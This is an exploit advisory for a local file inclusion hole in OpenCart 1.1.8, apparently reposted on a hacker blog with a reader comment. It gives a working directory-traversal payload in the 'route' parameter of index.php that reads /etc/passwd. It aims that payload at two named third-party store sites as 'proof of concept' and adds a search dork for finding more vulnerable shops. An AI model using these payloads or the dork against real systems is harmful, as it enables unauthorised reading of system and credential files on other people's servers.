Opencart 1.1.8 LFI Injection Vuln

[o] Opencart 1.1.8 LFI Injection Vulnerability
Title : Opencart LFI Injection Vulnerability
Software : OpenCart opencart_v1.1.8
Vendor : http://www.opencart.com/
Date : 25 April 2009 ( Indonesia )
Author : OoN_Boy
Contact : oon.boy9@gmail.com
Blog : http://oonboy.blogspot.com


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?route=[LFI]
http://localhost/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd


[o] Proof Of Concept
http://www.perebook.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd
http://store.thespaberry.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd


[o] Dork
"Powered by opencart"


[0] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny
Dan buat semuanya yg ga bisa di sebut satu²


One Response so far.

  1. Anonymous says:

    wow.......
    nice post..looks like easy but it kinda hard to start from basic. lolz......!

    martfellaproduction at yahoo dot com
    :):):)
    wish u were here brother,
    :D